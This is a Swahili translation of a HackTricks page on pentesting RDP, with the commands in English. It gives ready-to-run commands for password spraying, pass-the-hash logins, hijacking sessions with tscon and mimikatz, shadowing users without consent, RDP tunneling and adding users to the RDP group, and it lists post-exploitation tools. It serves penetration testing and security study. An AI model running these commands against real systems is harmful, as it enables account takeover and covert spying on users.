3389 - Pentesting RDP

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

• Angalia subscription plans!
• Jiunge na 💬 Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
• Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.

Taarifa za Msingi

Imetengenezwa na Microsoft, Remote Desktop Protocol (RDP) imesanifiwa kuwezesha muunganisho wa kiolesura cha picha kati ya kompyuta kupitia mtandao. Ili kuanzisha muunganisho huo, mtumiaji anatumia programu ya client ya RDP, na kwa wakati huo huo, kompyuta ya mbali inapaswa kuendesha programu ya server ya RDP. Mpangilio huu unaruhusu udhibiti na upatikanaji bila mshono wa mazingira ya desktop ya kompyuta ya mbali, ikileta kiolesura chake kwenye kifaa cha mtumiaji.

Default port: 3389

PORT     STATE SERVICE
3389/tcp open  ms-wbt-server

Uorodheshaji

Kiotomatiki

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 <IP>

Inakagua encryption inayopatikana na udhaifu wa DoS (bila kusababisha DoS kwa huduma) na hupata NTLM Windows info (matoleo).

Tabaka la Usalama / NLA Ukaguzi

RDP inaweza kujadili tabaka tofauti za usalama (native RDP, TLS, or CredSSP/NLA). Unaweza haraka fingerprint settings za server-side na ikiwa NLA inahitajika:

# Security layer and encryption info
nmap --script rdp-enum-encryption -p 3389 <IP>

# Quick auth check (also reports if NLA is required)
nxc rdp <IP> -u <user> -p <password>

# Pre-auth screenshot only works if NLA is disabled
nxc rdp <IP> --nla-screenshot

# Authenticated screenshot after valid login
nxc rdp <IP> -u <user> -p <password> --screenshot

Brute force

Kuwa mwangalifu, unaweza kufunga akaunti

Password Spraying

Kuwa mwangalifu, unaweza kufunga akaunti

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Unganisha kwa credentials/hash zilizojulikana

rdesktop -u <username> <IP>
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP> #Pass the hash

Angalia credentials zilizojulikana dhidi ya RDP services

rdp_check.py kutoka impacket inakuwezesha kuangalia ikiwa baadhi ya credentials ni halali kwa RDP service:

rdp_check <domain>/<name>:<password>@<IP>

Mashambulio

Session stealing

Kwa SYSTEM permissions unaweza kufikia opened RDP session by any user bila ya kuhitaji kujua nywila ya mmiliki.

Pata vikao vilivyofunguliwa:

query user

Ufikiaji wa kikao kilichochaguliwa

tscon <ID> /dest:<SESSIONNAME>

Sasa utakuwa ndani ya session ya RDP uliyoichagua na utajifanya mtumiaji kwa kutumia tu zana na vipengele vya Windows.

Muhimu: Unapofikia sessions za RDP zinazoendelea utamtoa mtumiaji aliyekuwa akiitumia.

Unaweza kupata nywila kwa kupiga dump mchakato huo, lakini njia hii ni ya haraka zaidi na inakuwezesha kuingiliana na virtual desktops za mtumiaji (nywila zilizomo katika notepad bila kuhifadhiwa kwenye diski, sessions nyingine za RDP zilizo wazi kwenye mashine nyingine…)

Mimikatz

Unaweza pia kutumia mimikatz kufanya hivyo:

ts::sessions        #Get sessions
ts::remote /id:2    #Connect to the session

RDP Shadowing (Remote Control)

Ikiwa Remote Desktop Services shadowing imewezeshwa, unaweza kutazama au kudhibiti kikao cha mtumiaji mwingine kinachoendelea (mara nyingine bila idhini) kwa kutumia vigezo vilivyojengwa ndani vya mstsc.

# List sessions on a remote host
qwinsta /server:<IP>
quser /server:<IP>

# Shadow a specific session (consent required if policy enforces it)
mstsc /v:<IP> /shadow:<SESSION_ID> /control

# Shadow without consent if policy allows it
mstsc /v:<IP> /shadow:<SESSION_ID> /noconsentprompt /prompt

# Check current shadowing policy on the target
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow

RDP Virtual Channel Tunneling

RDP inaunga mkono virtual channels ambazo zinaweza kutumiwa vibaya kwa ajili ya pivoting/tunneling kupitia kikao cha RDP kilichothibitishwa. Chaguo moja ni rdp2tcp (client/server), ambayo inaweza multiplex TCP forwards kupitia RDP (inafanya kazi na FreeRDP).

# Start FreeRDP with rdp2tcp virtual channel
xfreerdp /u:<user> /v:<IP> /rdp2tcp:/path/to/rdp2tcp/client/rdp2tcp

Tunneling and Port Forwarding

Sticky-keys & Utilman

Kuchanganya mbinu hii na stickykeys au utilman utaweza kupata CMD ya msimamizi na RDP session yoyote wakati wowote

You can search RDPs that have been backdoored with one of these techniques already with: https://github.com/linuz/Sticky-Keys-Slayer

RDP Process Injection

Ikiwa mtu kutoka domain tofauti au akiwa na better privileges login via RDP kwenye PC ambapo wewe ni Admin, unaweza inject beacon yako ndani ya RDP session process yake na kutenda kama yeye:

RDP Sessions Abuse

Kuongeza Mtumiaji kwenye kikundi la RDP

net localgroup "Remote Desktop Users" UserLoginName /add

Zana za Kiotomatiki

• AutoRDPwn

AutoRDPwn ni mfumo wa post-exploitation uliotengenezwa katika Powershell, uliobuniwa hasa kuendesha kwa otomatiki shambulio la Shadow kwenye kompyuta za Microsoft Windows. Udhaifu huu (ulioorodheshwa kama kipengele na Microsoft) unamruhusu mshambuliaji wa mbali kuona desktop ya waathiriwa bila idhini yake, na hata kuiweka udhibiti kwa mahitaji, akitumia zana za asili za mfumo wa uendeshaji huo.

• EvilRDP

• Dhibiti mouse na keyboard kwa njia ya kiotomatiki kutoka command line

• Dhibiti clipboard kwa njia ya kiotomatiki kutoka command line

• Zalisha SOCKS proxy kutoka kwa client inayotuma mawasiliano ya mtandao kwa lengo kupitia RDP

• Tekeleza amri za SHELL na PowerShell yoyote kwenye lengo bila kupakia faili

• Pakiwa na pakua faili kwa/kutoka kwa lengo hata pale uhamisho wa faili umezimwa kwenye lengo

• SharpRDP

Zana hii inaruhusu kutekeleza amri kwenye RDP ya waathiriwa bila kuhitaji kiolesura cha grafiki.

HackTricks Amri za Kiotomatiki

Protocol_Name: RDP    #Protocol Abbreviation if there is one.
Port_Number:  3389     #Comma separated if there is more than one.
Protocol_Description: Remote Desktop Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for RDP
Note: |
Developed by Microsoft, the Remote Desktop Protocol (RDP) is designed to enable a graphical interface connection between computers over a network. To establish such a connection, RDP client software is utilized by the user, and concurrently, the remote computer is required to operate RDP server software. This setup allows for the seamless control and access of a distant computer's desktop environment, essentially bringing its interface to the user's local device.

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-rdp.html

Entry_2:
Name: Nmap
Description: Nmap with RDP Scripts
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}

Marejeo

• https://swarm.ptsecurity.com/remote-desktop-services-shadowing/
• https://www.errno.fr/rdptunneling/

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Vinjari katalogi kamili ya HackTricks Training kwa ajili ya njia za assessment (ARTA/GRTA/AzRTA) na Linux Hacking Expert (LHE).

Support HackTricks

• Angalia subscription plans!
• Jiunge na 💬 Discord group, telegram group, fuata @hacktricks_live kwenye X/Twitter, au angalia LinkedIn page na YouTube channel.
• Shiriki hacking tricks kwa kutuma PRs kwenye HackTricks na HackTricks Cloud github repos.